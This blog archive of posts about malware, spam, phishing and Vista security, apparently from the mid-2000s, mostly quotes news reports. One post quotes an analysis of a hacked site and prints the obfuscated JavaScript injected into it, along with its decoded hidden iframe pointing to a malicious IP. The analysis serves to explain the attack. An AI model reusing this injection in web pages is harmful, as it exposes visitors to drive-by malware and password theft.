Category Archives: Malware

Blog spam

Posted on by

According to this,

A recent study by WebmasterWorld found that an estimated 77% of all blogs on Google’s Blogspot service were spam. Similarly, AOL Hometown, had well over 80% of its results turn out to be spam. Even MSN Spaces, which as not mentioned in the report, is claimed to host an estimated ten percent of spammer Web site.

It seems as if nearly every major free blog hosting service has been either overrun or nearly overrun with spam. However, one services stands alone, a relative oasis of spam cleanliness, Automattic’s WordPress.com. Despite being just as free as its competitors and placing few restrictions on registration, WordPress.com has not endured the spam avalanche that other services have.

Though there have been spam attacks in the past, the spammers have been easily shut down and, overall, the service remains relatively free of the splogs that seem to choke up its competitors. Though paid services such as Typepad also enjoy a relatively spam-free existance, what WordPress.com does is very rare for a free service…

Those numbers are very interesting. Wonder how they affect the Technorati figures about 71 million blogs (as of now) and two new ones being created every second. Also: what is Google doing about the Blogspot problem?

Footnote: Memex runs on WordPress.

The new malware ecology

Posted on by

Ethan Zuckerman has a fascinating story about how contemporary malware works.

It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of proptesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleages pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

script language=”javascript”> document.write( unescape(
‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E’
) );

That’s some seriously obfuscated Javascript. But if you translate from hexidecimal to ASCII, the code’s pretty clear – it inserts the following code into the top of the HTML page:

< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.

Googling for the specific IP – 81.95.146.98 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.

Vista flaws begin to emerge

Posted on by

There’s a certain predictability about this. According to John Markoff in the New York Times…

Microsoft is facing an early crisis of confidence in the quality of its Windows Vista operating system as computer security researchers and hackers have begun to find potentially serious flaws in the system that was released to corporate customers late last month.

On Dec. 15, a Russian programmer posted a description of a flaw that makes it possible to increase a user’s privileges on all of the company’s recent operating systems, including Vista. And over the weekend a Silicon Valley computer security firm said it had notified Microsoft that it had also found that flaw, as well as five other vulnerabilities, including one serious error in the software code underlying the company’s new Internet Explorer 7 browser.

The browser flaw is particularly troubling because it potentially means that Web users could become infected with malicious software simply by visiting a booby-trapped site. That would make it possible for an attacker to inject rogue software into the Vista-based computer, according to executives at Determina, a company based in Redwood City, Calif., that sells software intended to protect against operating system and other vulnerabilities…

Spam 2.0

Posted on by

From today’s New York Times

The antispam industry is struggling to keep up with the surge. It is adding computer power and developing new techniques in an effort to avoid losing the battle with the most sophisticated spammers.

It wasn’t supposed to turn out this way. Three years ago, Bill Gates, Microsoft’s chairman, made an audacious prediction: the problem of junk e-mail, he said, “will be solved by 2006.” And for a time, there were signs that he was going to be proved right.

Antispam software for companies and individuals became increasingly effective, and many computer users were given hope by the federal Can-Spam Act of 2003, which required spam senders to allow recipients to opt out of receiving future messages and prescribed prison terms for violators.

According to the Federal Trade Commission, the volume of spam declined in the first eight months of last year.

But as many technology administrators will testify, the respite was short-lived.

“At the beginning of the year spam was off our radar,” said Franklin Warlick, senior messaging systems administrator at Cox Communications in Atlanta.

“Now employees are stopping us in the halls to ask us if we turned off our spam filter,” Mr. Warlick said.

Mehran Sabbaghian, a network engineer at the Sacramento Web hosting company Lanset America, said that last month a sudden Internet-wide increase in spam clogged his firm’s servers so badly that the delivery of regular e-mail to customers was delayed by hours.

To relieve the pressure, the company took the drastic step of blocking all messages from several countries in Europe, Latin America and Africa, where much of the spam was originating.

This week, Lanset America plans to start accepting incoming mail from those countries again, but Mr. Sabbaghian said the problem of junk e-mail was “now out of control.”

Antispam companies fought the scourge successfully, for a time, with a blend of three filtering strategies. Their software scanned each e-mail and looked at whom the message was coming from, what words it contained and which Web sites it linked to. The new breed of spam — call it Spam 2.0 — poses a serious challenge to each of those three approaches.

Spammers have effectively foiled the first strategy — analyzing the reputation of the sender — by conscripting vast networks of computers belonging to users who unknowingly downloaded viruses and other rogue programs. The infected computers begin sending out spam without the knowledge of their owners. Secure Computing, an antispam company in San Jose, Calif., reports that 250,000 new computers are captured and added to these spam “botnets” each day.

The sudden appearance of new sources of spam makes it more difficult for companies to rely on blacklists of known junk e-mail distributors. Also, by using other people’s computers to scatter their e-mail across the Internet, spammers vastly increase the number of messages they can send out, without having to pay for the data traffic they generate.

“Because they are stealing other people’s computers to send out the bad stuff, their marginal costs are zero,” said Daniel Drucker, a vice president at the antispam company Postini. “The scary part is that the economics are now tilted in their favor.”

The use of botnets to send spam would not matter as much if e-mail filters could still make effective use of the second spam-fighting strategy: analyzing the content of an incoming message. Traditional antispam software examines the words in a text message and, using statistical techniques, determines if the words are more likely to make up a legitimate message or a piece of spam.

The explosion of image spam this year has largely thwarted that approach. Spammers have used images in their messages for years, in most cases to offer a peek at a pornographic Web site, or to illustrate the effectiveness of their miracle drugs. But as more of their text-based messages started being blocked, spammers searched for new methods and realized that putting their words inside the image could frustrate text filtering. The use of other people’s computers to send their bandwidth-hogging e-mail made the tactic practical.

“They moved their message into our blind spot,” said Paul Judge, chief technology officer of Secure Computing…

Allchin recants, er, clarifies

Posted on by

Further to that earlier post, Jim Allchin has been, er, clarifying his remarks about Vista and anti-virus software.

During a recent discussion with journalists about the release to manufacturing for Windows Vista, I made a comment about how attacks on the Internet are getting more and more sophisticated, and some of the security features in Windows Vista really help our customers. This somehow morphed into people thinking I said customers shouldn’t use antivirus software with Windows Vista.

When the articles and blogs started appearing, I asked the PR folks to send me a copy of the transcript of the call so I could read it over and see if I said something I didn’t mean. After reading the transcript, I could certainly see that what I said wasn’t as clear as it could have been, and I’m sorry for that. However, it is also clear from the transcript that I didn’t say that users shouldn’t run antivirus software with Windows Vista! In fact, later in the call, I explicitly made this point again, because I had realized I wasn’t as clear as I should have been. It’s important for me that our customers are using the appropriate security solutions for the right situations, whether that’s security functionality integrated in the operating systems, or add-on products.

The point I had been trying to make (albeit unclearly) is that Windows Vista includes new security features that can dramatically help improve our customers’ security for certain situations. I was asked a question about how I rated the protection provided by Windows XP with Service Pack 2 and whether or not it was still effective. I ended up telling a story about how the machine my seven-year-old son uses has no antivirus software installed because it runs in a very locked down configuration, which includes only being able to visit websites on an approved list (approved through the parental controls feature in Windows Vista). He also has no access to email or instant messaging and he doesn’t run as an administrator of the machine. In fact, parental controls in Windows Vista requires that the user you apply controls to is not running as an administrator. Email, phishing, and other social engineering attacks are definitely among the most prevalent attacks that home users experience today, and his machine has been locked down in these regards.

My point in bringing up this extreme example was really meant to emphasize that importance of defense-in-depth measures we put in Windows Vista—both the number of defenses and their combined effectiveness.

Now, the comments have unfortunately been cited out of context implying that I said Windows Vista users shouldn’t use antivirus. I want to be clear, most users will use some form of antivirus software, and that will be appropriate for their scenarios. In fact, Windows Security Center, a great feature in Windows Vista, specifically encourages the use of antivirus software.

Hostages to fortune

Posted on by

Jim Allchin, Microsoft VP, quoted on Good Morning Silicon Valley, talking about Vista.

In my opinion, it is the most secure system that’s available, and it’s certainly the most secure system that we’ve shipped. So I feel very confident that customers are far better off by using Windows Vista than they are with anything that we’ve released before.”

Earlier, he had said that he was so confident in the operating system’s security measures that he believes there’s no need for Vista users to run any third-party antivirus software.

Stay tuned.

LATER… Bill Thompson has written an insightful column about this. Excerpt:

Vista will ship with Kernel Patch Protection – also called PatchGuard – which checks to see if the core has been altered in any way. This should make it a lot harder for viruses, trojans, rootkits and other types of malicious software, or malware, to install.

PatchGuard will be backed up by support for the Trusted Platform Module, a hardware component built into many new computers that gives the operating system a way to store and use secured information.

The new approach should make life more difficult for malware writers, but it is also going to get in the way of legitimate security software vendors such as Symantec, which has already pointed out that its anti-virus programs rely on being able to modify the Windows kernel, something which will no longer be allowed.

Microsoft’s response is to argue that “kernel patching”, as the process is called, is not needed and that the standard security tools are all that are required.

It may be right, but it’s hard to tell because we don’t actually know much about what is going on inside the Vista kernel. Microsoft, like many other commercial software developers, prefers to keep such details secret.

“If severe flaws are discovered in Vista”, Bill concludes, “and there already signs that the lockdown is far from perfect, then users may well wonder why they have put their faith in the ‘benign dictator’ approach to security.”

One born every minute

Posted on by

This morning’s Observer column — on the profitability of spam.

So who were the schmucks buying this stuff? It seems that among those who responded to Amazing’s spam – under the subject line, ‘Make your penis HUGE’ – was the manager of a $6bn mutual fund, who ordered two bottles of Pinacle to be shipped to his Park Avenue office in New York. A restaurateur in Boulder, Colorado requested four bottles. The president of a California firm that sells aeroplane parts and is active in the local Rotary Club gave out his American Express card number to pay for six bottles. And so on.

So pharmaceutical spamming is profitable. What then of the ‘pump and dump’ variety? A new study by Jonathan Zittrain of the Oxford Internet Institute and Laura Frieder of Purdue University in Indiana provides persuasive evidence that it, too, is profitable – though probably less so than penis-enlargement spams…

Stock spamming works

Posted on by

Sophos, a Massachusetts-based supplier of software for protecting companies and consumers from online threats, reported in July that 15 percent of all junk e-mail messages are now stock spam, up dramatically from less than 1 percent 18 months ago. Here’s a Technology Revew piece about some interesting research conducted by Jonathan Zittrain and a colleague. Excerpt:

Stock spam uses the classic “pump-and-dump” scheme. A spammer sends out a mass e-mail message touting a penny stock with low trading volume in hopes of convincing a handful of people to buy shares of it. If the spammer succeeds, the limited buying activity boosts the stock’s price and liquidity just long enough for the spammer to sell his own shares (or the shares of his client) at a profit. The stock subsequently plunges and those who bought it are usually hit with a loss.

In their study, Zittrain and co-author Laura Frieder, an assistant professor of finance at Purdue University in Indiana, sought to quantify the effectiveness of such campaigns. To do so, they analyzed more than 75,000 stock “touts” appearing in Zittrain’s e-mail inbox and a Usenet spam-sighting newsgroup between January 2004 and July 2005. The date and estimated size of each spam campaign was compared with the price and trading volume of the company shares being promoted over several days, including the day immediately preceding the campaign.

The researchers discovered that if a spammer bought a stock a day before beginning heavy touting, then sold the morning after the first day of touting, the average return on investment was 4.9 percent. And more effective spammers saw a 6 percent return.

On the other hand, if a victim were to invest $1,000 in a stock on the day of heaviest touting, that investment would be worth, on average, $947.50 in the two days following the spamming campaign. For the most heavily touted stocks, the same investment would fall by 7 percent, to $930. The study also confirmed that the volume of touted stocks responded “positively and significantly” to touting campaigns, meaning that trading activity increased.

“Our analysis shows that [stock] spam works,” wrote Zittrain and Frieder. “Among its millions of recipients are not only those who read it, but who also act upon it, suggesting a value to spamming that will create a powerful counterbalance to regulatory and technical efforts to contain it.”

Phishing is so yesterday

Posted on by

A new use for VoIP. From Internet News

Just as Internet surfers have gotten wise to the fine art of phishing, along comes a new scam utilizing a new technology.

Creative thieves are now switching their efforts to “vishing,” which uses Voice over Internet Protocol (VoIP) phones instead of a misdirected Web link to steal user information.

Phishing (define) is the sneaky art of sending an e-mail to people pretending to be from a bank or major online merchant, such as Amazon (Quote, Chart)or EBay (Quote, Chart), asking them to click on a link and verify their account information.

The user is then directed to a fake site that collects the login and password information.

Repeated efforts on the part of security firms have educated users to be cautious about clicking on links from unknown senders.

But now, the criminal element has shifted from asking people to click on links to placing a phone call instead. Only the number isn’t to a bank or credit card, it’s to a VoIP phone that can recognize telephone keystrokes.

The thieves don’t even use an e-mail blast, they use a war dial over a VoIP system to blanket an area. A recorded message tells the person receiving the call that their credit card has been breached and to “call the following (regional) phone number immediately.”

When the user calls the number, another message is played stating “this is account verification please enter your 16 digit account number.” The rest is academic.

Secure Computing, which specializes in secure connections over networks, sent up the red flag over this new method. Secure Computing engineers have been tracking news group sites and open disclosure discussion groups discussing vishing.

“This is just a natural evolution of phishing itself,” said Paul Henry, vice president of strategic accounts for Secure Computing….

Thanks to Kevin Cryer for the link.